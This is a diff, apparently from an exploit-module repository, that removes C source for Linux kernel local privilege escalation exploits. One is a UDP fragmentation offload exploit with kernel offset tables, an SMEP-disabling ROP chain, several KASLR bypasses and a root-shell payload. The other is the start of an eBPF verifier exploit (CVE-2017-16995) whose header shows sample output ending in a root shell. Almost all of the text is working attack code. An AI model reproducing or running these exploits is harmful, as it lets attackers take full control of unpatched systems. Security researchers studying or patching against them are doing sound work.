-	{ "trusty", "4.4.0-72-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
-	{ "trusty", "4.4.0-75-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
-	{ "trusty", "4.4.0-78-generic", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
-	{ "trusty", "4.4.0-79-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },
-	{ "trusty", "4.4.0-81-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },
-	{ "trusty", "4.4.0-83-generic", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },
-	{ "trusty", "4.4.0-87-generic", 0x9ec20, 0x9ef00, 0x8a, 0x253b93, 0x109a17, 0x1a840, 0x3e7cda, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },
-	{ "trusty", "4.4.0-89-generic", 0x9ec30, 0x9ef10, 0x8a, 0x3ec5cF, 0x109a27, 0x1a830, 0x3e7fba, 0x1cc7c, 0x77523, 0x49d1d, 0x62360, 0x1a77b },
-	{ "xenial", "4.4.0-81-generic", 0xa2800, 0xa2bf0, 0x8a, 0x3eb4ad, 0x112697, 0x1b9c0, 0x40341a, 0x1de6c, 0x7a453, 0x125787, 0x64580, 0x49ed0 },
-	{ "xenial", "4.4.0-89-generic", 0xa28a0, 0xa2c90, 0x8a, 0x33e60d, 0x112777, 0x1b9b0, 0x403a1a, 0x1de5c, 0x7a483, 0x1084e5, 0x645b0, 0x3083d },
-	{ "xenial", "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
-	{ "xenial", "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
-	{ "xenial", "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
-	{ "xenial", "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
-	// { "xenial", "4.8.0-42-generic", 0xa5cf0, 0xa60e0, 0x8d, 0x4149ad, 0x1191f7, 0x1b170, 0x439d7a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0xb2df1b },
-	// { "xenial", "4.8.0-44-generic", 0xa5cf0, 0xa60e0, 0x8d, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0xb2df17 },
-	{ "xenial", "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },
-	{ "xenial", "4.8.0-46-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
-	{ "xenial", "4.8.0-49-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
-	{ "xenial", "4.8.0-51-generic", 0xa5d00, 0xa60f0, 0x8d, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
-	{ "xenial", "4.8.0-52-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
-	{ "xenial", "4.8.0-53-generic", 0xa5d00, 0xa60f0, 0x8d, 0x301f2d, 0x119207, 0x01b170, 0x43a0da, 0x63e843, 0x07bd03, 0x12c7d7, 0x64210, 0x49f60 },
-	{ "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
-	{ "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
-	{ "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
-};
-
-// Used to get root privileges.
-#define COMMIT_CREDS			(KERNEL_BASE + kernels[kernel].commit_creds)
-#define PREPARE_KERNEL_CRED		(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)
-
-// Used when ENABLE_SMEP_BYPASS is used.
-// - xchg eax, esp ; ret
-// - pop rdi ; ret
-// - mov dword ptr [rdi], eax ; ret
-// - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret
-// - neg rax ; ret
-// - pop rcx ; ret 
-// - or rax, rcx ; ret
-// - xchg eax, edi ; ret
-// - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret
-// - jmp rcx
-#define XCHG_EAX_ESP_RET		(KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)
-#define POP_RDI_RET			(KERNEL_BASE + kernels[kernel].pop_rdi_ret)
-#define MOV_DWORD_PTR_RDI_EAX_RET	(KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)
-#define MOV_RAX_CR4_RET			(KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)
-#define NEG_RAX_RET			(KERNEL_BASE + kernels[kernel].neg_rax_ret)
-#define POP_RCX_RET			(KERNEL_BASE + kernels[kernel].pop_rcx_ret)
-#define OR_RAX_RCX_RET			(KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)
-#define XCHG_EAX_EDI_RET		(KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)
-#define MOV_CR4_RDI_RET			(KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)
-#define JMP_RCX				(KERNEL_BASE + kernels[kernel].jmp_rcx)
-
-// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
-
-typedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
-typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);
-
-void get_root(void) {
-	((_commit_creds)(COMMIT_CREDS))(
-	    ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));
-}
-
-// * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *
-
-uint64_t saved_esp;
-
-// Unfortunately GCC does not support `__atribute__((naked))` on x86, which
-// can be used to omit a function's prologue, so I had to use this weird
-// wrapper hack as a workaround. Note: Clang does support it, which means it
-// has better support of GCC attributes than GCC itself. Funny.
-void wrapper() {
-	asm volatile ("					\n\
-	payload:					\n\
-		movq %%rbp, %%rax			\n\
-		movq $0xffffffff00000000, %%rdx		\n\
-		andq %%rdx, %%rax			\n\
-		movq %0, %%rdx				\n\
-		addq %%rdx, %%rax			\n\
-		movq %%rax, %%rsp			\n\
-		call get_root				\n\
-		ret					\n\
-	" : : "m"(saved_esp) : );
-}
-
-void payload();
-
-#define CHAIN_SAVE_ESP				\
-	*stack++ = POP_RDI_RET;			\
-	*stack++ = (uint64_t)&saved_esp;	\
-	*stack++ = MOV_DWORD_PTR_RDI_EAX_RET;
-
-#define SMEP_MASK 0x100000
-
-#define CHAIN_DISABLE_SMEP			\
-	*stack++ = MOV_RAX_CR4_RET;		\
-	*stack++ = NEG_RAX_RET;			\
-	*stack++ = POP_RCX_RET;			\
-	*stack++ = SMEP_MASK;			\
-	*stack++ = OR_RAX_RCX_RET;		\
-	*stack++ = NEG_RAX_RET;			\
-	*stack++ = XCHG_EAX_EDI_RET;		\
-	*stack++ = MOV_CR4_RDI_RET;
-
-#define CHAIN_JMP_PAYLOAD                     \
-	*stack++ = POP_RCX_RET;               \
-	*stack++ = (uint64_t)&payload;        \
-	*stack++ = JMP_RCX;
-
-void mmap_stack() {
-	uint64_t stack_aligned, stack_addr;
-	int page_size, stack_size, stack_offset;
-	uint64_t* stack;
-
-	page_size = getpagesize();
-
-	stack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);
-	stack_addr = stack_aligned - page_size * 4;
-	stack_size = page_size * 8;
-	stack_offset = XCHG_EAX_ESP_RET % page_size;
-
-	stack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,
-			MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
-	if (stack == MAP_FAILED || stack != (void*)stack_addr) {
-		dprintf("[-] mmap()\n");
-		exit(EXIT_FAILURE);
-	}
-
-	stack = (uint64_t*)((char*)stack_aligned + stack_offset);
-
-	CHAIN_SAVE_ESP;
-	CHAIN_DISABLE_SMEP;
-	CHAIN_JMP_PAYLOAD;
-}
-
-// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
-
-struct ubuf_info {
-	uint64_t callback;	// void (*callback)(struct ubuf_info *, bool)
-	uint64_t ctx;		// void *
-	uint64_t desc;		// unsigned long
-};
-
-struct skb_shared_info {
-	uint8_t nr_frags;	// unsigned char
-	uint8_t tx_flags;	// __u8
-	uint16_t gso_size;	// unsigned short
-	uint16_t gso_segs;	// unsigned short
-	uint16_t gso_type;	// unsigned short
-	uint64_t frag_list;	// struct sk_buff *
-	uint64_t hwtstamps;	// struct skb_shared_hwtstamps
-	uint32_t tskey;		// u32
-	uint32_t ip6_frag_id;	// __be32
-	uint32_t dataref;	// atomic_t
-	uint64_t destructor_arg; // void *
-	uint8_t frags[16][17];	// skb_frag_t frags[MAX_SKB_FRAGS];
-};
-
-struct ubuf_info ui;
-
-void init_skb_buffer(char* buffer, unsigned long func) {
-	struct skb_shared_info* ssi = (struct skb_shared_info*)buffer;
-	memset(ssi, 0, sizeof(*ssi));
-
-	ssi->tx_flags = 0xff;
-	ssi->destructor_arg = (uint64_t)&ui;
-	ssi->nr_frags = 0;
-	ssi->frag_list = 0;
-
-	ui.callback = func;
-}
-
-// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
-
-#define SHINFO_OFFSET 3164
-
-void oob_execute(unsigned long payload) {
-	char buffer[4096];
-	memset(&buffer[0], 0x42, 4096);
-	init_skb_buffer(&buffer[SHINFO_OFFSET], payload);
-
-	int s = socket(PF_INET, SOCK_DGRAM, 0);
-	if (s == -1) {
-		dprintf("[-] socket()\n");
-		exit(EXIT_FAILURE);
-	}
-
-	struct sockaddr_in addr;
-	memset(&addr, 0, sizeof(addr));
-	addr.sin_family = AF_INET;
-	addr.sin_port = htons(8000);
-	addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
-
-	if (connect(s, (void*)&addr, sizeof(addr))) {
-		dprintf("[-] connect()\n");
-		exit(EXIT_FAILURE);
-	}
-
-	int size = SHINFO_OFFSET + sizeof(struct skb_shared_info);
-	int rv = send(s, buffer, size, MSG_MORE);
-	if (rv != size) {
-		dprintf("[-] send()\n");
-		exit(EXIT_FAILURE);
-	}
-
-	int val = 1;
-	rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));
-	if (rv != 0) {
-		dprintf("[-] setsockopt(SO_NO_CHECK)\n");
-		exit(EXIT_FAILURE);
-	}
-
-	send(s, buffer, 1, 0);
-
-	close(s);
-}
-
-// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
-
-#define CHUNK_SIZE 1024
-
-int read_file(const char* file, char* buffer, int max_length) {
-	int f = open(file, O_RDONLY);
-	if (f == -1)
-		return -1;
-	int bytes_read = 0;
-	while (true) {
-		int bytes_to_read = CHUNK_SIZE;
-		if (bytes_to_read > max_length - bytes_read)
-			bytes_to_read = max_length - bytes_read;
-		int rv = read(f, &buffer[bytes_read], bytes_to_read);
-		if (rv == -1)
-			return -1;
-		bytes_read += rv;
-		if (rv == 0)
-			return bytes_read;
-	}
-}
-
-#define LSB_RELEASE_LENGTH 1024
-
-void get_distro_codename(char* output, int max_length) {
-	char buffer[LSB_RELEASE_LENGTH];
-	char* path = "/etc/lsb-release";
-	int length = read_file(path, &buffer[0], LSB_RELEASE_LENGTH);
-	if (length == -1) {
-               dprintf("[-] open/read(%s)\n", path);
-               exit(EXIT_FAILURE);
-	}
-	const char *needle = "DISTRIB_CODENAME=";
-	int needle_length = strlen(needle);
-	char* found = memmem(&buffer[0], length, needle, needle_length);
-	if (found == NULL) {
-		dprintf("[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\n");
-		exit(EXIT_FAILURE);
-	}
-	int i;
-	for (i = 0; found[needle_length + i] != '\n'; i++) {
-		if (i >= max_length) {
-			exit(EXIT_FAILURE);
-		}
-		if ((found - &buffer[0]) + needle_length + i >= length) {
-			exit(EXIT_FAILURE);
-		}
-		output[i] = found[needle_length + i];
-	}
-}
-
-struct utsname get_kernel_version() {
-	struct utsname u;
-	int rv = uname(&u);
-	if (rv != 0) {
-		dprintf("[-] uname()\n");
-		exit(EXIT_FAILURE);
-	}
-	return u;
-}
-
-#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
-
-#define DISTRO_CODENAME_LENGTH 32
-
-void detect_kernel() {
-	char codename[DISTRO_CODENAME_LENGTH];
-	struct utsname u;
-
-	u = get_kernel_version();
-
-	if (strstr(u.machine, "64") == NULL) {
-		dprintf("[-] system is not using a 64-bit kernel\n");
-		exit(EXIT_FAILURE);
-	}
-
-	if (strstr(u.version, "-Ubuntu") == NULL) {
-		dprintf("[-] system is not using an Ubuntu kernel\n");
-		exit(EXIT_FAILURE);
-	}
-
-	if (strstr(u.version, "14.04.1")) {
-		strcpy(&codename[0], "trusty");
-	} else if (strstr(u.version, "16.04.1")) {
-		strcpy(&codename[0], "xenial");
-	} else {
-		get_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);
-
-		// Linux Mint kernel release mappings
-		if (!strcmp(&codename[0], "qiana"))
-			strcpy(&codename[0], "trusty");
-		if (!strcmp(&codename[0], "rebecca"))
-			strcpy(&codename[0], "trusty");
-		if (!strcmp(&codename[0], "rafaela"))
-			strcpy(&codename[0], "trusty");
-		if (!strcmp(&codename[0], "rosa"))
-			strcpy(&codename[0], "trusty");
-		if (!strcmp(&codename[0], "sarah"))
-			strcpy(&codename[0], "xenial");
-		if (!strcmp(&codename[0], "serena"))
-			strcpy(&codename[0], "xenial");
-		if (!strcmp(&codename[0], "sonya"))
-			strcpy(&codename[0], "xenial");
-	}
-
-	int i;
-	for (i = 0; i < ARRAY_SIZE(kernels); i++) {
-		if (strcmp(&codename[0], kernels[i].distro) == 0 &&
-		    strcmp(u.release, kernels[i].version) == 0) {
-			dprintf("[.] kernel version '%s' detected\n", kernels[i].version);
-			kernel = i;
-			return;
-		}
-	}
-
-	dprintf("[-] kernel version not recognized\n");
-	exit(EXIT_FAILURE);
-}
-
-#define PROC_CPUINFO_LENGTH 4096
-
-// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP
-int smap_smep_enabled() {
-	char buffer[PROC_CPUINFO_LENGTH];
-	char* path = "/proc/cpuinfo";
-	int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
-	if (length == -1) {
-		dprintf("[-] open/read(%s)\n", path);
-		exit(EXIT_FAILURE);
-	}
-	int rv = 0;
-	char* found = memmem(&buffer[0], length, "smep", 4);
-	if (found != NULL)
-		rv += 1;
-	found = memmem(&buffer[0], length, "smap", 4);
-	if (found != NULL)
-		rv += 2;
-	return rv;
-}
-
-void check_smep_smap() {
-	int rv = smap_smep_enabled();
-	if (rv >= 2) {
-		dprintf("[-] SMAP detected, no bypass available\n");
-		exit(EXIT_FAILURE);
-	}
-#if !ENABLE_SMEP_BYPASS
-	if (rv >= 1) {
-		dprintf("[-] SMEP detected, use ENABLE_SMEP_BYPASS\n");
-		exit(EXIT_FAILURE);
-	}
-#endif
-}
-
-// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
-
-#define SYSLOG_ACTION_READ_ALL 3
-#define SYSLOG_ACTION_SIZE_BUFFER 10
-
-bool mmap_syslog(char** buffer, int* size) {
-	*size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
-	if (*size == -1) {
-		dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
-		return false;
-	}
-
-	*size = (*size / getpagesize() + 1) * getpagesize();
-	*buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
-				   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
-
-	*size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
-	if (*size == -1) {
-		dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
-		return false;
-	}
-
-	return true;
-}
-
-unsigned long get_kernel_addr_trusty(char* buffer, int size) {
-	const char* needle1 = "Freeing unused";
-	char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-	if (substr == NULL) return 0;
-
-	int start = 0;
-	int end = 0;
-	for (end = start; substr[end] != '-'; end++);
-
-	const char* needle2 = "ffffff";
-	substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-	if (substr == NULL) return 0;
-
-	char* endptr = &substr[16];
-	unsigned long r = strtoul(&substr[0], &endptr, 16);
-
-	r &= 0xffffffffff000000ul;
-
-	return r;
-}
-
-unsigned long get_kernel_addr_xenial(char* buffer, int size) {
-	const char* needle1 = "Freeing unused";
-	char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-	if (substr == NULL) {
-		return 0;
-	}
-
-	int start = 0;
-	int end = 0;
-	for (start = 0; substr[start] != '-'; start++);
-	for (end = start; substr[end] != '\n'; end++);
-
-	const char* needle2 = "ffffff";
-	substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-	if (substr == NULL) {
-		return 0;
-	}
-
-	char* endptr = &substr[16];
-	unsigned long r = strtoul(&substr[0], &endptr, 16);
-
-	r &= 0xfffffffffff00000ul;
-	r -= 0x1000000ul;
-
-	return r;
-}
-
-unsigned long get_kernel_addr_syslog() {
-	unsigned long addr = 0;
-	char* syslog;
-	int size;
-
-	dprintf("[.] trying syslog...\n");
-
-	if (!mmap_syslog(&syslog, &size))
-		return 0;
-
-	if (strcmp("trusty", kernels[kernel].distro) == 0)
-		addr = get_kernel_addr_trusty(syslog, size);
-	if (strcmp("xenial", kernels[kernel].distro) == 0)
-		addr = get_kernel_addr_xenial(syslog, size);
-
-	if (!addr)
-		dprintf("[-] kernel base not found in syslog\n");
-
-	return addr;
-}
-
-// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr_kallsyms() {
-	FILE *f;
-	unsigned long addr = 0;
-	char dummy;
-	char sname[256];
-	char* name = "startup_64";
-	char* path = "/proc/kallsyms";
-
-	dprintf("[.] trying %s...\n", path);
-	f = fopen(path, "r");
-	if (f == NULL) {
-		dprintf("[-] open/read(%s)\n", path);
-		return 0;
-	}
-
-	int ret = 0;
-	while (ret != EOF) {
-		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-		if (ret == 0) {
-			fscanf(f, "%s\n", sname);
-			continue;
-		}
-		if (!strcmp(name, sname)) {
-			fclose(f);
-			return addr;
-		}
-	}
-
-	fclose(f);
-	dprintf("[-] kernel base not found in %s\n", path);
-	return 0;
-}
-
-// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr_sysmap() {
-	FILE *f;
-	unsigned long addr = 0;
-	char path[512] = "/boot/System.map-";
-	char version[32];
-
-	struct utsname u;
-	u = get_kernel_version();
-	strcat(path, u.release);
-	dprintf("[.] trying %s...\n", path);
-	f = fopen(path, "r");
-	if (f == NULL) {
-		dprintf("[-] open/read(%s)\n", path);
-		return 0;
-	}
-
-	char dummy;
-	char sname[256];
-	char* name = "startup_64";
-	int ret = 0;
-	while (ret != EOF) {
-		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-		if (ret == 0) {
-			fscanf(f, "%s\n", sname);
-			continue;
-		}
-		if (!strcmp(name, sname)) {
-			fclose(f);
-			return addr;
-		}
-	}
-
-	fclose(f);
-	dprintf("[-] kernel base not found in %s\n", path);
-	return 0;
-}
-
-// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr_mincore() {
-	unsigned char buf[getpagesize()/sizeof(unsigned char)];
-	unsigned long iterations = 20000000;
-	unsigned long addr = 0;
-
-	dprintf("[.] trying mincore info leak...\n");
-	/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
-	if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
-		MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
-		dprintf("[-] mmap()\n");
-		return 0;
-	}
-
-	int i;
-	for (i = 0; i <= iterations; i++) {
-		/* Touch a mishandle with this type mapping */
-		if (mincore((void*)0x86000000, 0x1000000, buf)) {
-			dprintf("[-] mincore()\n");
-			return 0;
-		}
-
-		int n;
-		for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
-			addr = *(unsigned long*)(&buf[n]);
-			/* Kernel address space */
-			if (addr > 0xffffffff00000000) {
-				addr &= 0xffffffffff000000ul;
-				if (munmap((void*)0x66000000, 0x20000000000))
-					dprintf("[-] munmap()\n");
-				return addr;
-			}
-		}
-	}
-
-	if (munmap((void*)0x66000000, 0x20000000000))
-		dprintf("[-] munmap()\n");
-
-	dprintf("[-] kernel base not found in mincore info leak\n");
-	return 0;
-}
-
-// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr() {
-	unsigned long addr = 0;
-
-	addr = get_kernel_addr_kallsyms();
-	if (addr) return addr;
-
-	addr = get_kernel_addr_sysmap();
-	if (addr) return addr;
-
-	addr = get_kernel_addr_syslog();
-	if (addr) return addr;
-
-	addr = get_kernel_addr_mincore();
-	if (addr) return addr;
-
-	dprintf("[-] KASLR bypass failed\n");
-	exit(EXIT_FAILURE);
-
-	return 0;
-}
-
-// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
-
-static bool write_file(const char* file, const char* what, ...) {
-	char buf[1024];
-	va_list args;
-	va_start(args, what);
-	vsnprintf(buf, sizeof(buf), what, args);
-	va_end(args);
-	buf[sizeof(buf) - 1] = 0;
-	int len = strlen(buf);
-
-	int fd = open(file, O_WRONLY | O_CLOEXEC);
-	if (fd == -1)
-		return false;
-	if (write(fd, buf, len) != len) {
-		close(fd);
-		return false;
-	}
-	close(fd);
-	return true;
-}
-
-void setup_sandbox() {
-	int real_uid = getuid();
-	int real_gid = getgid();
-
-	if (unshare(CLONE_NEWUSER) != 0) {
-		dprintf("[!] unprivileged user namespaces are not available\n");
-		dprintf("[-] unshare(CLONE_NEWUSER)\n");
-		exit(EXIT_FAILURE);
-	}
-	if (unshare(CLONE_NEWNET) != 0) {
-		dprintf("[-] unshare(CLONE_NEWUSER)\n");
-		exit(EXIT_FAILURE);
-	}
-
-	if (!write_file("/proc/self/setgroups", "deny")) {
-		dprintf("[-] write_file(/proc/self/set_groups)\n");
-		exit(EXIT_FAILURE);
-	}
-	if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
-		dprintf("[-] write_file(/proc/self/uid_map)\n");
-		exit(EXIT_FAILURE);
-	}
-	if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
-		dprintf("[-] write_file(/proc/self/gid_map)\n");
-		exit(EXIT_FAILURE);
-	}
-
-	cpu_set_t my_set;
-	CPU_ZERO(&my_set);
-	CPU_SET(0, &my_set);
-	if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
-		dprintf("[-] sched_setaffinity()\n");
-		exit(EXIT_FAILURE);
-	}
-
-	if (system("/sbin/ifconfig lo mtu 1500") != 0) {
-		dprintf("[-] system(/sbin/ifconfig lo mtu 1500)\n");
-		exit(EXIT_FAILURE);
-	}
-	if (system("/sbin/ifconfig lo up") != 0) {
-		dprintf("[-] system(/sbin/ifconfig lo up)\n");
-		exit(EXIT_FAILURE);
-	}
-}
-
-void exec_shell() {
-	int fd;
-
-	fd = open("/proc/1/ns/net", O_RDONLY);
-	if (fd == -1) {
-		dprintf("error opening /proc/1/ns/net\n");
-		exit(EXIT_FAILURE);
-	}
-
-	if (setns(fd, CLONE_NEWNET) == -1) {
-		dprintf("error calling setns\n");
-		exit(EXIT_FAILURE);
-	}
-
-	system(SHELL);
-}
-
-bool is_root() {
-	// We can't simple check uid, since we're running inside a namespace
-	// with uid set to 0. Try opening /etc/shadow instead.
-	int fd = open("/etc/shadow", O_RDONLY);
-	if (fd == -1)
-		return false;
-	close(fd);
-	return true;
-}
-
-void check_root() {
-	dprintf("[.] checking if we got root\n");
-	if (!is_root()) {
-		dprintf("[-] something went wrong =(\n");
-		return;
-	}
-	dprintf("[+] got r00t ^_^\n");
-	exec_shell();
-}
-
-int main(int argc, char** argv) {
-	if (argc > 1) SHELL = argv[1];
-
-	dprintf("[.] starting\n");
-
-	dprintf("[.] checking kernel version\n");
-	detect_kernel();
-	dprintf("[~] done, version looks good\n");
-
-	dprintf("[.] checking SMEP and SMAP\n");
-	check_smep_smap();
-	dprintf("[~] done, looks good\n");
-
-	dprintf("[.] setting up namespace sandbox\n");
-	setup_sandbox();
-	dprintf("[~] done, namespace sandbox set up\n");
-
-#if ENABLE_KASLR_BYPASS
-	dprintf("[.] KASLR bypass enabled, getting kernel addr\n");
-	KERNEL_BASE = get_kernel_addr();
-	dprintf("[~] done, kernel addr:   %lx\n", KERNEL_BASE);
-#endif
-
-	dprintf("[.] commit_creds:        %lx\n", COMMIT_CREDS);
-	dprintf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED);
-
-	unsigned long payload = (unsigned long)&get_root;
-
-#if ENABLE_SMEP_BYPASS
-	dprintf("[.] SMEP bypass enabled, mmapping fake stack\n");
-	mmap_stack();
-	payload = XCHG_EAX_ESP_RET;
-	dprintf("[~] done, fake stack mmapped\n");
-#endif
-
-	dprintf("[.] executing payload %lx\n", payload);
-	oob_execute(payload);
-	dprintf("[~] done, should be root now\n");
-
-	check_root();
-
-	return 0;
-}

data/exploits/cve-2017-16995/exploit.c

@@ -1,496 +0,0 @@
-/*
-  Credit @bleidl, this is a slight modification to his original POC
-  https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c
-  
-  For details on how the exploit works, please visit
-  https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
-   
-  Tested on Ubuntu 16.04 with the following Kernels
-  4.4.0-31-generic
-  4.4.0-62-generic
-  4.4.0-81-generic
-  4.4.0-116-generic
-  4.8.0-58-generic
-  4.10.0.42-generic
-  4.13.0-21-generic
-
-  Tested on Fedora 27
-  4.13.9-300
-  gcc cve-2017-16995.c -o cve-2017-16995
-  internet@client:~/cve-2017-16995$ ./cve-2017-16995
-  [.]
-  [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
-  [.]
-  [.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
-  [.]
-  [*] creating bpf map
-  [*] sneaking evil bpf past the verifier
-  [*] creating socketpair()
-  [*] attaching bpf backdoor to socket
-  [*] skbuff => ffff880038c3f500  
-  [*] Leaking sock struct from ffff88003af5e180
-  [*] Sock->sk_rcvtimeo at offset 472
-  [*] Cred structure at ffff880038704600
-  [*] UID from cred structure: 1000, matches the current: 1000
-  [*] hammering cred structure at ffff880038704600
-  [*] credentials patched, launching shell...
-  #id
-  uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)
-  
-*/
-
-#include <errno.h>
-#include <fcntl.h>
-#include <stdarg.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-#include <linux/bpf.h>
-#include <linux/unistd.h>
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/socket.h>
-#include <sys/un.h>
-#include <sys/stat.h>
-#include <sys/personality.h>
-
-char buffer[64];
-int sockets[2];
-int mapfd, progfd;
-int doredact = 0;
-
-#define LOG_BUF_SIZE 65536
-#define PHYS_OFFSET 0xffff880000000000
-char bpf_log_buf[LOG_BUF_SIZE];
